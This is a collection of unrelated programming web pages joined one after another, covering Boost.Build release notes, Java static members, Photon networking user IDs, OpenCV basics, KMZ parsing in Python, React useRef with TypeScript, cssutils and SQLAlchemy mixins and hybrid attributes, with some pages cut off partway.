engine build to consistently use ANSI Win32 API. — Mateusz Loskot Fix b2 engine not exiting, with error, early when it detects a Jam language error. — Mateusz Loskot Print help for local modules, i.e. current dir. — Thomas Brown 13.12. Version 4.1.0 Many small bug fixes in this release. But there are some new features also. There’s now an lto feature to specify the use of LTO, and what kind. The existing stdlib feature now has real values and corresponding options for some toolsets. But most importantly there’s new documentation for all the features. Thank to all the users that contributed to this release with these changes: Support for VS2019 for intel-vin 19.0. — Edward Diener Fix compiler warnings about -std=gnu11when building b2on Cygwin. — Andrey Semashev Add example of creating multiple PCHs for individual headers. — René Ferdinand Rivera Morell Add QNX threading flags for GCC toolset. — Aurelien Chartier Fix version option for IBM and Sun compilers when building b2 engine — Juan Alday Rename strings.hto jam_strings.hin b2engine to avoid clash with POSIX strings.hheader. — Andrey Semashev Add options for cxxstdfeature for IBM compiler. — Edward Diener Many fixes to intel-win toolset. — Edwad Diener Add z15 instruction set for gcc based toolsets. — Neale Ferguson Improve using MSVC from a Cygwin shell. — Michael Haubenwallner Add LTO feature and corresponding support for gcc and clang toolsets. — Dmitry Arkhipov Fix errors when a source doesn’t have a type. — Peter Dimov Add documentation for features. — Dmitry Arkhipov Enhance stdlibfeature, and corresponding documentation, for clang, gcc, and sun toolsets. — Dmitry Arkhipov Install rule now makes explicit only the immediate targets it creates. — Dmitry Arkhipov Add armasm (32 and 64) support for msvc toolset. — Michał Janiszewski Fix errors with custom un-versioned gcc toolset specifications. — Peter Dimov Allow arflags override in gcc toolset specifications. — hyc Fix founds libs not making it to the clang-win link command line. — Peter Dimov Updated intel-win toolset to support for Intel C++ 19.1. — Edward Diener Detect difference between MIPS32 and MIPS64 for OS in b2 engine. — YunQiang Su 13.13. Version 4.0.1 This patch release fixes a minor issue when trying to configure toolsets that override the toolset version with a non-version tag. Currently this is only known to be a problem if you: (a) configure a toolset version to something like “tot” (b) in Boost 1.72.0 when it creates cmake install artifacts. Fix for this was provided Peter Dimov. 13.14.. Other changes in this release: Add support for using prebuilt OpenSSL. — Damian Jarek Define the riscv architecture feature. — Andreas Schwab Add ARM64 as a valid architecture for MSVC. — Marc Sweetgall Set coverage flags, from coverage feature, for gcc and clang. — Damian Jarek Add s390x CPU and support in gcc/clang. — Neale Ferguson Support importing pkg-config packages. — Dmitry Arkhipov Support for leak sanitizer. — Damian Jarek Fix missing /manifestoption in clang-win to fix admin elevation for exes with "update" in the name. — Peter Dimov Add freertosto osfeature. — Thomas Brown Default parallel jobs ( -jX) to the available CPU threads. — René Ferdinand Rivera Morell Simpler coverage feature. — Hans Dembinski Better stacks for sanitizers. — James E. King III
https://www.boost.org/doc/libs/1_78_0/tools/build/doc/html/index.html
CC-MAIN-2022-21
en
refinedweb
static keyword is used to modify member variables and member methods. The modified member belongs to a class, not just an instance object. In other words, since it belongs to a class, it can be called without creating an instance object. ◆ static variables Static variables, also known as class variables, are written equivalent to member variables modified by static keywords. All objects of the class share the data of the same class variable. Any object can change the value of the class variable of the class, or access or modify the class variable without creating the object of the class. 1. Syntax format <Permission modifier> static <data type> <Variable name>; // eg: static String classroom; - The permission modifier is unnecessary, and no modifier is equivalent to default 2. Source code example Taking students as an example, each student is an independent individual, but many students belong to the same classroom, so the classroom number is taken as its static variable. public class Student { /** * Member variable */ private String name; /** * Static variable * * Multiple objects share the same data */ public static String classroom; public Student(){ System.out.println("Nonparametric construction method..."); }; public Student(String name){ System.out.println("Full parameter construction method..."); this.name = name; } public String getName() { return name; } public void setName(String name) { this.name = name; } public static String getClassroom() { return classroom; } public static void setClassroom(String classroom) { Student.classroom = classroom; } } ◆ static method Static methods, also known as class methods, are written equivalent to member methods modified by static keywords. 1. Syntax format <Modifier > static <return type> <Method name> (<parameter list>){ [Method body] } // eg: public static String getClassroom() { return classroom; } public static void setClassroom(String classroom) { Student.classroom = classroom; } Class methods can directly access class variables and class methods, including itself Class methods cannot directly access ordinary member variables or member methods, but member methods can directly access class variables or static methods, because static contents will be loaded and called in memory first, and then non-static contents will be generated This keyword cannot be used in static methods, because this pointer represents the current object, which is essentially non static content 2. Source code example /** * Member method */ public void show(){ System.out.println("Member method..."); // Member methods can access member variables System.out.println(name); // Member methods can access static variables System.out.println(classroom); } /** * Static method */ public static void location(){ System.out.println("Static method..."); System.out.println(classroom); // Non static variables cannot be accessed directly // System.out.println(name); // this keyword cannot be used // System.out.println(this); } ◆ static code block Static code block refers to the code block defined at the same level of members and decorated with static keyword. When the system starts, it is executed only once with the loading of classes, which takes precedence over the execution of all methods including main method and constructor method. 1. Syntax format static { [Execute statement] } - It is generally used to assign initial values to class variables 2. Source code example /* * Static code block * * When the class is used for the first time, the static code block is executed, and only once * In addition, static code blocks always take precedence over non static execution, so static code blocks are executed before construction methods * * It is generally used to assign a value to a static member variable at one time */ static { System.out.println("Static code block execution..."); classroom = "201"; } ◆ test cases The content of static modification is loaded with the loading of the class, and it is loaded only once. There is a fixed area in memory called static area, which is used to store static content. Therefore, it can be directly called by the class name. Because it has limited existence with objects, it can be shared with all objects of this class. 1. Syntax format // Access class variables [Class name].[Class variable name]; [Object name].[Class variable name]; // Static method call [Class name].[Static method name(parameter list)]; [Object name].[Static method name(parameter list)]; // eg: Student.classroom; Student.location(); - Multiple objects belong to the same class and share the same static content. Therefore, static members can be accessed through the object name, but it is not recommended. This is not only semantically inconsistent, but also warning messages will appear 2. Source code example import org.junit.Assert; import org.junit.Test; /** * @author : LiuYJ * @version : v1.0 * @date : Created at 2020/11/5 09:20 * @date : Modified at 2020/11/5 09:20 */ public class StudentTest { @Test public void testBlock() { // Static code blocks are executed before the class is used System.out.println(Student.classroom); Assert.assertEquals("201", Student.classroom); } @Test public void testVariable() { // Class variables can be accessed through objects Student joyce = new Student("Joyce"); Assert.assertEquals("Joyce", joyce.getName()); Assert.assertEquals("201", joyce.classroom); joyce.classroom = "205"; // It is recommended to access by class name instead of object name Assert.assertEquals("205", Student.classroom); } @Test public void testMethod() { // Class methods can be called through objects Student joyce = new Student("Joyce"); Assert.assertEquals("Joyce", joyce.getName()); joyce.setClassroom("203"); Assert.assertEquals("203", joyce.getClassroom()); // It is recommended to call by class name instead of object name Student.setClassroom("203"); Student.location(); } } All test cases pass and print the following information: // testBlock Static code block execution... 201 // testVariable Full parameter construction method... // testMethod Full parameter construction method... Static method... 203 ◆ application scenarios Static keyword, which can modify variables, methods and code blocks. In the process of using, the main application still wants to call methods without creating objects. We generally call classes that provide a large number of static methods as tool classes. Take a guessing game as an example to briefly introduce the powerful functions of the following tools: - Generate a random number - 10 guessing opportunities, one feedback at a time - If you guess right or the opportunity is completely consumed, the game is over @Test public void testGuess() { double random = Math.random() * 100; long actual = Math.round(random); boolean isSuccess = false; for (int i = 0; i < 10; i++) { Scanner scanner = new Scanner(System.in); int expected = scanner.nextInt(); if (expected > actual){ System.out.println("Too bigger!"); }else if (expected < actual){ System.out.println("Too Smaller!"); }else { isSuccess = true; System.out.println("Success!"); break; } } if (!isSuccess){ System.out.println("Game over!"); } } - java.lang.Math is a math related tool class. random() can obtain a pseudo-random number between [0.1.0], and round() can obtain the integer closest to the floating point number, which is equivalent to rounding - java.util.Scanner is a scanner, through which we can obtain the data entered from the keyboard The above-mentioned words are the words of one family. If there are omissions and fallacies, criticism and correction are welcome!The above-mentioned words are the words of one family. If there are omissions and fallacies, criticism and correction are welcome!
https://algorithm.zone/blogs/java_-01_-002-static-keyword.html
CC-MAIN-2022-21
en
refinedweb
UserIDs and Friends UserIDs In Photon, a player is identified using a unique UserID. This UserID is useful inside and outside rooms. Photon clients with the same UserID can be connected to the same server but you can't join the same Photon room from two separate clients using the same UserID. Each actor inside the room should have a unique UserID. In old C# client SDKs, this was enabled using RoomOptions.CheckUserOnJoin. Unique UserIDs Generally, UserIDs are not intended to be displayed. Unlike usernames, displaynames or nicknames. A UserID does not have to be human-readable or very human-friendly. So you could, for instance, use a GUID as a UserID. The advantages of keeping a unique UserID per player: - You preserve your data between game sessions and across multiple devices. You can rejoin rooms and resume playing where you stopped. - You can become known to all players you meet and easily identifiable by everyone. You can play with your friends, send them invitations and challenges, make online parties, form teams and guilds, etc. You can add user profiles (e.g. experience, statistics, achievements, levels, etc.) and make games more challenging (also using tournaments and leaderboards). - You could make use of another service to bind Photon UserID to an external unique identifier. For instance, Photon UserID could be set to Facebook ID, Google ID, Steam ID, PlayFab ID, etc. - You can prohibit malicious users from connecting to your applications by keeping a blacklist of their UserIDs and making use of Custom Authentication. Setting UserIDs Once authenticated, a Photon client will keep the same UserID until disconnected. The UserID for a client can be set in three ways: - Client sends its UserID before connecting by setting AuthenticationValues.UserId. This option is useful when you do not use Custom Authentication and want to set a UserID. - An external authentication provider returns the UserID on successful authentication. See Custom Authentication. It will override any value sent by the client. - Photon Server will assign GUIDs as IDs for users that did not get UserIDs using 1 or 2. So even anonymous users will have UserIDs. Publish UserIDs Players can share their UserIDs with each other inside rooms. In C# SDKs, to enable this and make the UserID visible to everyone, set RoomOptions.PublishUserId to true, when you create a room. The server will then broadcast this information on each new join and you can access each player's UserID using Player.UserId.); Friends - Friends' UserIDs are case sensitive. Example: "mybestfriend" and "MyBestFriend" are two different UserIDs for two different friends. - Only friends connected to the same AppID, the same Photon Cloud region and play the same Photon AppVersion can find each other no matter what device or platform they're using. - FindFriends works only when connected to the Master Server, it does not work when the client is joined to a room. You can find out if your friends who are playing the same game are online and if so, which room they are joined to. Like users, friends are also identified using their UserID. So the FriendID is the same thing as the UserID and in order to find some friends you need to know their UserIDs first. Then you can send the list of UserIDs to Photon Servers using: using System.Collections.Generic; using UnityEngine; using Photon.Realtime; using Photon.Pun; public class FindFriendsExample : MonoBehaviourPunCallbacks { public bool FindFriends(string[] friendsUserIds) { return PhotonNetwork.FindFriends(friendsUserIds); } public override void OnFriendListUpdate(List<FriendInfo> friendsInfo) { for(int i=0; i < friendsInfo.Count; i++) { FriendInfo friend = friendsInfo[i]; Debug.LogFormat("{0}", friend); } } } Photon does not persist friends lists. You may need an external service for that. Since Photon does not keep track of your userbase, any non existing user in your game will just be considered offline. A friend is considered online only when he/she is connected to Photon at the time of making the FindFriends query. A room name will be returned per user if the latter is online and joined to the room with the same name. If multiple clients with the same UserId are joined to multiple separate rooms in the same Cluster / VirtualApp, FindFriends should return the latest joined one.
https://doc.photonengine.com/zh-cn/pun/v2/lobby-and-matchmaking/userids-and-friends
CC-MAIN-2022-21
en
refinedweb
How to use React useRef with TypeScript Are you getting a crazy amount of errors from TypeScript when you’re using React.useRef typing? Or maybe the error says, “Object is possibly null.” In today’s short article, I will go over how to properly define, and use your useRef hook with TypeScript. The solution As the first example, I’m going to create an h1 element tag. And I want to get the element reference with TypeScript. import React, { useRef, useLayoutEffect } from 'react'; const App = () => { const h1Ref = useRef<HTMLHeadingElement>(null); console.log(h1Ref) // { current: null } useLayoutEffect(() => { console.log(h1Ref); // { current: <h1_object> } }) return ( <h1 ref={h1Ref}>App</h1> ) } export default App; Let’s go over it really quickly. I’ve imported the React useRef, and useLayoutEffect tooling. If you’re not familiar with React useLayoutEffect, I recommend you go read a previous article to learn more about it, “When to use React useRef and useLayoutEffect vs useEffect.” I then initiated a useRef hook and added an open and close ( <>) bracket before the parenthesis. Inside that bracket I used the HTMLHeadingElement type definition because I’m attempting to get a header element reference. Each native HTML element has their own type definition. Here are some other examples: More useRef examples // <div> reference type const divRef = React.useRef<HTMLDivElement>(null); // <button> reference type const buttonRef = React.useRef<HTMLButtonElement>(null); // <br /> reference type const brRef = React.useRef<HTMLBRElement>(null); // <a> reference type const linkRef = React.useRef<HTMLLinkElement>(null); When you create a invoke a useRef hook, it’s important to pass null as the default value. This is important because React.useRef can only be null, or the element object. I then put the h1Ref variable inside the ref property of my H1 element. After the first render React.useRef will return an object with a property key called current. “Object is possibly null” error First of all, make sure to use the useLayoutEffect hook whenever you’re doing any work with the DOM reference object. Second, make sure you’re always running conditionals to make sure that the reference object is not null. if (null !== h1Ref.current) { h1Ref.current.innerText = 'Hello world!'; } This is important because what if you have a function that accepts a reference but not a null value. function changeInnerText(el: HTMLElement, value: string) { el.innerText = value; } changeInnerText(h1Ref.current, 'hello world'); This may throw TypeError: Object is possibly null Or TypeError: Cannot set property 'innerText' of null So always run your conditionals in TypeScript to make sure the DOM reference value is the right type. function changeInnerText(el: HTMLElement, value: string) { el.innerText = value; } if (null !== h1Ref.current) { changeInnerText(h1Ref.current, 'hello world'); } Oh wow, you’ve made it this far! If you enjoyed this article perhaps like or retweet the thread on Twitter: I like to tweet about TypeScript and React and post helpful code snippets. Follow me there if you would like some too!
https://linguinecode.com/post/how-to-use-react-useref-with-typescript
CC-MAIN-2022-21
en
refinedweb
Hi Lee, Once we have made the switch to use Reflex in the implementation of CINT, we shall return to enhancing CINT. This would then be a good time to add a better support for the iostream manipulator. Cheers, Philippe From: owner-roottalk_at_pcroot.cern.ch [mailto:owner-roottalk_at_pcroot.cern.ch] On Behalf Of Lee, Kerry T. (JSC-SF)[LMIT] Sent: Thursday, November 09, 2006 12:47 PM To: roottalk_at_pcroot.cern.ch Subject: [ROOT] formatting streams Dear Rooters (but most likely this is for Masa) I am using ROOT version 5.13.01 on a linux box with gcc 3.4.4. When executing fomatting commands of streams on the CINT command line, some work and others don't. Here is an example: #include <iomanip> double a = 2.0 double b = 1.1 cout<<std::setw(10)<<a // 2(class ostream)116863616 cout<<std::showpoint<<a //0xbe80362(class ostream)116863616 cout<<std::showpoint<<b //0xbe80361.1(class ostream)116863616 There is a workaround by using cout.setf(), but this is not as nice as doing "on-the-fly" formatting. root [6] cout.setf(ios::showpoint) (ios_base::fmtflags)4098 root [7] cout<<b 1.10000(class ostream)116863616 root [8] cout<<a 2.00000(class ostream)116863616 Is it possible to include the other formatting manipulations to work like the std::setw() command on the CINT command line? Thanks Kerry Received on Fri Nov 10 2006 - 19:32:08 MET This archive was generated by hypermail 2.2.0 : Mon Jan 01 2007 - 16:32:01 MET
https://root.cern.ch/root/roottalk/roottalk06/1468.html
CC-MAIN-2022-21
en
refinedweb
libmicro - Man Page library for embedding HTTP servers Library library “libmicro Synopsis #include < micro Description GNU libmicro (short MHD) allows applications to easily integrate the functionality of a simple HTTP server. MHD is a GNU package. The details of the API are described in comments in the header file, a detailed reference documentation in Texinfo, a tutorial, and in brief on the MHD webpage. Legal Notice libmicro is released under both the LGPL Version 2.1 or higher and the GNU GPL with eCos extension. For details on both licenses please read the respective appendix in the Texinfo manual. Files - micro libmicro include file - libmicro libmicro library See Also curl(1), libcurl(3), info libmicro Authors GNU libmicro was originally designed by Christian Grothoff <christian@grothoff.org> and Chris GauthierDickey <chrisg@cs.du.edu>. The original implementation was done by Daniel Pittman <depittman@gmail.com> and Christian Grothoff. SSL/TLS support was added by Sagie Amir using code from GnuTLS. See the AUTHORS file in the distribution for a more detailed list of contributors. Availability You can obtain the latest version from Bugs Report bugs by using Mantis.
https://www.mankier.com/3/libmicrohttpd
CC-MAIN-2022-21
en
refinedweb
SQLAlchemy 1.4 Documentation SQLAlchemy 1.4 Documentation current release Home | Download this Documentation SQLAlchemy ORM - ORM Quick Start - Object Relational Tutorial (1.x API) - Mapper Configuration - Mapping Python Classes - Mapping Classes with Declarative - Declarative Mapping Styles - Table Configuration with Declarative - Mapper Configuration with Declarative - Composing Mapped Hierarchies with Mixins¶ - Class Inheritance Hierarchies - Non-Traditional Mappings - Configuring a Version Counter - Class Mapping API - Relationship Configuration - Querying Data, Loading Objects - Using the Session - Events and Internals - ORM Extensions - ORM Examples Project Versions - Previous: Mapper Configuration with Declarative - Next: Mapping Columns and Expressions - Up: Home - On this page: - Composing Mapped Hierarchies with Mixins¶ A common need when mapping classes using the Declarative style is to share some functionality, such as a set of common columns, some common table options, or other mapped properties, across many classes. The standard Python idioms for this is to have the classes inherit from a superclass which includes these common features. When using declarative mappings, this idiom is allowed via the usage of mixin classes, as well as via augmenting the declarative base produced by either the registry.generate_base() method or declarative_base() functions. An example of some commonly mixed-in idioms is below: from sqlalchemy.orm import declarative_mixin from sqlalchemy.orm import declared_attr . Tip The use of the declarative_mixin() class decorator marks a particular class as providing the service of providing SQLAlchemy declarative assignments as a mixin for other classes. This decorator is currently only necessary to provide a hint to the Mypy plugin that this class should be handled as part of declarative mappings..orm import declared_attr class Base: @declared_attr def __tablename__(cls): return cls.__name__.lower() __table_args__ = {'mysql_engine': 'InnoDB'} id = Column(Integer, primary_key=True) from sqlalchemy.orm: @declarative_mixin class TimestampMixin:.orm import declared_attr @declarative_mixin class ReferenceAddressMixin: . Columns generated by declared_attr can also be referenced by __mapper_args__ to a limited degree, currently by polymorphic_on and version_id_col; the declarative extension will resolve them at class construction time: @declarative_mixin: @declarative_mixin class RefTargetMixin: function: @declarative_mixin class RefTargetMixin: : @declarative_mixin class RefTargetMixin: @declared_attr def target_id(cls): return Column('target_id', ForeignKey('target.id')) @declared_attr def target(cls): return relationship(Target, primaryjoin=lambda: Target.id==cls.target_id ) or alternatively, the string form (which ultimately generates a lambda): @declarative_mixin class RefTargetMixin: : @declarative_mixin class SomethingMixin: @declared_attr def dprop(cls): return deferred(Column(Integer)) class Something(SomethingMixin, Base): __tablename__ = "something" The column_property() or other construct may refer to other columns from the mixin. These are copied ahead of time before the declared_attr is invoked: @declarative_mixin class SomethingMixin:..ext.associationproxy import association_proxy from sqlalchemy.orm import declarative_base from sqlalchemy.orm import declarative_mixin from sqlalchemy.orm import declared_attr from sqlalchemy.orm import relationship Base = declarative_base() @declarative_mixin class HasStringCollection: ..orm import declarative_mixin from sqlalchemy.orm import declared_attr @declarative_mixin, we can modify our __tablename__ function to return None for subclasses, using has_inherited_table(). This has the effect of those subclasses being mapped with single table inheritance against the parent: from sqlalchemy.orm import declarative_mixin from sqlalchemy.orm import declared_attr from sqlalchemy.orm import has_inherited_table @declarative_mixin class Tablename: '}: @declarative_mixin class HasId: __: @declarative_mixin class HasIdMixin: .orm import declarative_mixin from sqlalchemy.orm import declared_attr @declarative_mixin class MySQLSettings: __table_args__ = {'mysql_engine':'InnoDB'} @declarative_mixin class MyOtherMixin: ___: @declarative_mixin class MyMixin: a = Column(Integer) b = Column(Integer) @declared_attr def __table_args__(cls): return (Index('test_idx_%s' % cls.__tablename__, 'a', 'b'),) class MyModel(MyMixin, Base): __tablename__ = 'atable' c = Column(Integer,primary_key=True) flambé! the dragon and The Alchemist image designs created and generously donated by Rotem Yaari.Created using Sphinx 4.5.0.
https://docs.sqlalchemy.org/en/14/orm/declarative_mixins.html
CC-MAIN-2022-21
en
refinedweb
Total novice here. I was overjoyed when the string formatting in Python 3 was overhauled and formatting became a breeze. Cutting to the chase, I’m going through the Django tutorial on ‘Writing your first app …’ where it walks you through the procedures to add more views to the poll/views.py starting with the following code snippet. def detail(request, question_id): return HttpResponse(“You’re looking at question %s.” % question_id) With nothing to loose, I modified it to use the f string formatting like so. def detail(request, question_id): return HttpResponse(f"You’re looking at question {question_id}") It worked. But before I take this tidbit and ‘assume’ it will continue to work in a ‘real’ app with the complexity of far more imports and views? What type of ‘gotchas’ would I likely see if I continue to deviate from the ‘norm’ the tutorials show to display a view? I used the search engine here to see if I ran upon any matches, but the results didn’t show me if this had come up before, or rather my query was ill conceived and executed. Feedback? Thoughts? I’m hoping a long time forum member isn’t beating the table going ‘Arrg! Not again!’ Doug
https://forum.djangoproject.com/t/python-3-f-string-formatting/5791
CC-MAIN-2022-21
en
refinedweb
- CSS) modern Python versions. Check the package metadata for compatibilty. Beware, cssutils is known to be thread unsafe. Example import cssutils css = '''/* } Kind Request cssutils is far from being perfect or even complete. If you find any bugs (especially specification violations) or have problems or suggestions please put them in the Issue Tracker. Thanks Special thanks to Christof Höke for seminal creation of the library.. Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/cssutils/
CC-MAIN-2022-21
en
refinedweb
Image Processing in Python using opncv Hola everyone, We know that image is combination of multiple rows & columns i.e. multi-dimentional array. Black & white images are 2D arrays and coloured imges are the 3D. 🤔 What is image processing ? Image processing is a method to perform some operations on an image, in order to get an enhanced image or to extract some useful information from it. 🤔Why we need image processing ? This gives computer a vision to detect and recognize the things and take actions accordingly. Image processing has lot of applications like Face detection & recognition, thumb impression, augmented reality, OCR, Barcode scan and many more. - Prerequisites for image processing -Numpy and Scipy libraries − For image manipuation and processing. -OpenCV −It is a huge open-source library for computer vision, machine learning, and image processing. Application are facial & gesture recognition, Human-computer interaction, Mobile robotics, Object identification and providing lots of tool . First of all Install OpenCV run the following pip command on CMD pip install opencv-python now import the cv2 module. import cv2 Let’s understand basic commands : - img = cv2.imread(“path”) :For reading the image, use the imread() method of the cv2 module. path is varible whish shows the image source. 2. cv2.imshow('name', variable_name):This command is used to show the image . 3. cv2.waitKey():The waitkey() functions take time as an argument in milliseconds as a delay for the window to close. Here we an set the time to show the window forever until we close it manually. 4. cv2.destroyAllWindows():cv2.destroyAllWindows() function, pressing any key on keyboard is closing the image window. 5.img.shape :It displays the shape of image in (rows,columns,dimention) 6. cut_image = img[x1: x2, y1: y2]: you can crop the images using numpy slicing concept. Let’s understand Image processing by performing few tasks. 🔅 Task 1 📌 Create image by yourself Using Python Code Here I’m trying to create image of hut, Output : 🔅 Task 2 📌 Take 2 image crop some part of both image and swap it. Output: 🔅Task 3 📌 Take 2 image and combine it to form single image. For example collage
https://rachana3073.medium.com/image-processing-in-python-using-opncv-c3936e8af3a1
CC-MAIN-2022-21
en
refinedweb
A and write data into KML format. I just needed to read the data for my later calculations. So I decided to build a solution using the Python Standard Library. The first trick is that a KMZ file is nothing else but a zip-compressed KML file. Inside you’ll find a file called doc.kml. So let’s open and extract: from zipfile import ZipFile kmz = ZipFile(filename, 'r') kml = kmz.open('doc.kml', 'r').read() The KML data’s juicy part looks something like this: <Folder> <name>11112222-XXYYZ-TESTTRACK</name> <Document> <name>11112222XXYYZTESTTRACK-track-20161214T105653+0100.kmz</name> <Placemark> <name>1111XXYYZ-track-20161214T105653+0100</name> <gx:Track> <when>2016-12-13T13:16:01.709+02:00</when> <when>2016-12-13T13:18:02.709+02:00</when> <when>2016-12-13T13:23:21.709+02:00</when> <when>2016-12-13T13:24:23.709+02:00</when> <!-- more timestamps --> <gx:coord>13.7111482XXXXXXX 51.0335960XXXXXXX 0</gx:coord> <gx:coord>13.7111577XXXXXXX 51.0337028XXXXXXX 0</gx:coord> <gx:coord>13.7113847XXXXXXX 51.0339241XXXXXXX 0</gx:coord> <gx:coord>13.7115764XXXXXXX 51.0341949XXXXXXX 0</gx:coord> <!-- more coordinates --> <ExtendedData> </ExtendedData> </gx:Track> </Placemark> <Placemark> <name>Reference Point #1</name> <Point> <coordinates>13.72467XXXXXXXXX,51.07873XXXXXXXXX,0</coordinates> </Point> </Placemark> <!-- more Placemarks --> </Document> </Folder> Now we can parse the resulting string using lxml : from lxml import html doc = html.fromstring(kml) for pm in doc.cssselect('Folder Document Placemark'): tmp = pm.cssselect('track') name = pm.cssselect('name')[0].text_content() if len(tmp): # Track Placemark tmp = tmp[0] # always one element by definition for desc in tmp.iterdescendants(): content = desc.text_content() if desc.tag == 'when': do_timestamp_stuff(content) elif desc.tag == 'coord': do_coordinate_stuff(content) else: print("Skipping empty tag %s" % desc.tag) else: # Reference point Placemark coord = pm.cssselect('Point coordinates')[0].text_content() do_reference_stuff(coord) Alright. Let’s see what’s going on here: First we regard the document as HTML and parse it using lxml.html. Then we iterate over all Placemarks in Folder > Document > Placemark. If a Placemark has a child track, it’s holding our timestamps and coordinate data. Otherwise it’s considered a reference point just holding some location data. With cssselect we can get the respective data and do stuff with it. Just keep in mind it returns a list, so you always have to access the first element. Then we call text_content()l to convert the tag content to a string for further manipulation and logging. It’s also worth mentioning that lxml and by extension cssselect do not support the necessary pseudo elements for KML. So you won’t be able to address anything like gx:Track. It’s not a big deal here if you know that you can still address the element with cssselect('track'). For more info look it up in the docs. I’m lazy, so I use cssselect. You might have to install this as a dependency with pip3 install cssselect. You can also use the selecting mechanism lxml provides, but previous experience has shown that it’s very tedious and hard to debug for such a quick and dirty hack. The rest is just string magic, really. Just split the content you get, convert it to a float and insert it into your data structure of choice to continue working with it later. Some info that helped me get a grip on the KML format:
https://dmuhs.blog/2018/09/14/parsing-kmz-track-data-in-python/
CC-MAIN-2022-21
en
refinedweb
¶ - Defining Expression Behavior Distinct from Attribute Behavior - Defining Setters - Allowing Bulk ORM Update - Working with Relationships - Building Custom Comparators - Reusing Hybrid Properties across Subclasses - Hybrid Value Objects - Building Transformers - API Reference - Indexable - Alternate Class Instrumentation - ORM Examples Project Versions - Previous: Horizontal Sharding - Next: Indexable - Up: Home - On this page: - Hybrid Attributes - Defining Expression Behavior Distinct from Attribute Behavior - Defining Setters - Allowing Bulk ORM Update - Working with Relationships - Building Custom Comparators - Reusing Hybrid Properties across Subclasses - Hybrid Value Objects - Building Transformers - API Reference Hybrid Attributes¶ Define attributes on ORM-mapped classes that have “hybrid” behavior. “hybrid” means the attribute has distinct behaviors defined at the class level and at the instance level. The hybrid extension provides a special form of method decorator, is around 50 lines of code and has almost no dependencies on the rest of SQLAlchemy. It can, in theory, work with any descriptor-based expression system. Consider a mapping Interval, representing integer start and end values. We can define higher level functions on mapped classes that produce SQL expressions at the class level, and Python expression evaluation at the instance level. Below, each function decorated with hybrid_method or hybrid_property may receive self as an instance of the class, or as the class itself: from sqlalchemy import Column, Integer from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import Session, aliased from sqlalchemy.ext.hybrid import hybrid_property, hybrid_method Base = declarative_base() class Interval(Base): __tablename__ = 'interval' id = Column(Integer, primary_key=True) start = Column(Integer, nullable=False) end = Column(Integer, nullable=False) def __init__(self, start, end): self.start = start self.end = end @hybrid_property def length(self): return self.end - self.start @hybrid_method def contains(self, point): return (self.start <= point) & (point <= self.end) @hybrid_method def intersects(self, other): return self.contains(other.start) | self.contains(other.end) Above, the length property returns the difference between the end and start attributes. With an instance of Interval, this subtraction occurs in Python, using normal Python descriptor mechanics: >>> i1 = Interval(5, 10) >>> i1.length 5 When dealing with the Interval class itself, the hybrid_property descriptor evaluates the function body given the Interval class as the argument, which when evaluated with SQLAlchemy expression mechanics (here using the QueryableAttribute.expression accessor) returns a new SQL expression: >>> print(Interval.length.expression) interval."end" - interval.start >>> print(Session().query(Interval).filter(Interval.length > 10)) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE interval."end" - interval.start > :param_1 ORM methods such as Query.filter_by() generally use getattr() to locate attributes, so can also be used with hybrid attributes: >>> print(Session().query(Interval).filter_by(length=5)) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE interval."end" - interval.start = :param_1 The Interval class example also illustrates two methods, contains() and intersects(), decorated with hybrid_method. This decorator applies the same idea to methods that hybrid_property applies to attributes. The methods return boolean values, and take advantage of the Python |and &bitwise operators to produce equivalent instance-level and SQL expression-level boolean behavior: >>> i1.contains(6) True >>> i1.contains(15) False >>> i1.intersects(Interval(7, 18)) True >>> i1.intersects(Interval(25, 29)) False >>> print(Session().query(Interval).filter(Interval.contains(15))) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE interval.start <= :start_1 AND interval."end" > :end_1 >>> ia = aliased(Interval) >>> print(Session().query(Interval, ia).filter(Interval.intersects(ia))) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end, interval_1.id AS interval_1_id, interval_1.start AS interval_1_start, interval_1."end" AS interval_1_end FROM interval, interval AS interval_1 WHERE interval.start <= interval_1.start AND interval."end" > interval_1.start OR interval.start <= interval_1."end" AND interval."end" > interval_1."end" Defining Expression Behavior Distinct from Attribute Behavior¶ Our usage of the hybrid decorators define the hybrid_property.expression() modifier for this purpose. As an example we’ll define the radius of the interval, which requires the usage of the absolute value function: &and |bitwise operators above was fortunate, considering our functions operated on two boolean values to return a new one. In many cases, the construction of an in-Python function and a SQLAlchemy SQL expression have enough differences that two separate Python expressions should be defined. The from sqlalchemy import func class Interval(object): # ... @hybrid_property def radius(self): return abs(self.length) / 2 @radius.expression def radius(cls): return func.abs(cls.length) / 2 Above the Python function abs() is used for instance-level operations, the SQL function ABS() is used via the func object for class-level expressions: >>> i1.radius 2 >>> print(Session().query(Interval).filter(Interval.radius > 5)) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE abs(interval."end" - interval.start) / :abs_1 > :param_1 Note When defining an expression for a hybrid property or method, the expression method must retain the name of the original hybrid, else the new hybrid with the additional state will be attached to the class with the non-matching name. To use the example above: class Interval(object): # ... @hybrid_property def radius(self): return abs(self.length) / 2 # WRONG - the non-matching name will cause this function to be # ignored @radius.expression def radius_expression(cls): return func.abs(cls.length) / 2 This is also true for other mutator methods, such as hybrid_property.update_expression(). This is the same behavior as that of the @property construct that is part of standard Python. Defining Setters¶ Hybrid properties can also define setter methods. If we wanted length above, when set, to modify the endpoint value: class Interval(object): # ... @hybrid_property def length(self): return self.end - self.start @length.setter def length(self, value): self.end = self.start + value The length(self, value) method is now called upon set: >>> i1 = Interval(5, 10) >>> i1.length 5 >>> i1.length = 12 >>> i1.end 17 Allowing Bulk ORM Update¶ A hybrid can define a custom “UPDATE” handler for when using the Query.update() method, allowing the hybrid to be used in the SET clause of the update. Normally, when using a hybrid with Query.update(), the SQL expression is used as the column that’s the target of the SET. If our Interval class had a hybrid start_point that linked to Interval.start, this could be substituted directly: session.query(Interval).update({Interval.start_point: 10}) However, when using a composite hybrid like Interval.length, this hybrid represents more than one column. We can set up a handler that will accommodate a value passed to Query.update() which can affect this, using the hybrid_property.update_expression() decorator. A handler that works similarly to our setter would be: class Interval(object): # ... @hybrid_property def length(self): return self.end - self.start @length.setter def length(self, value): self.end = 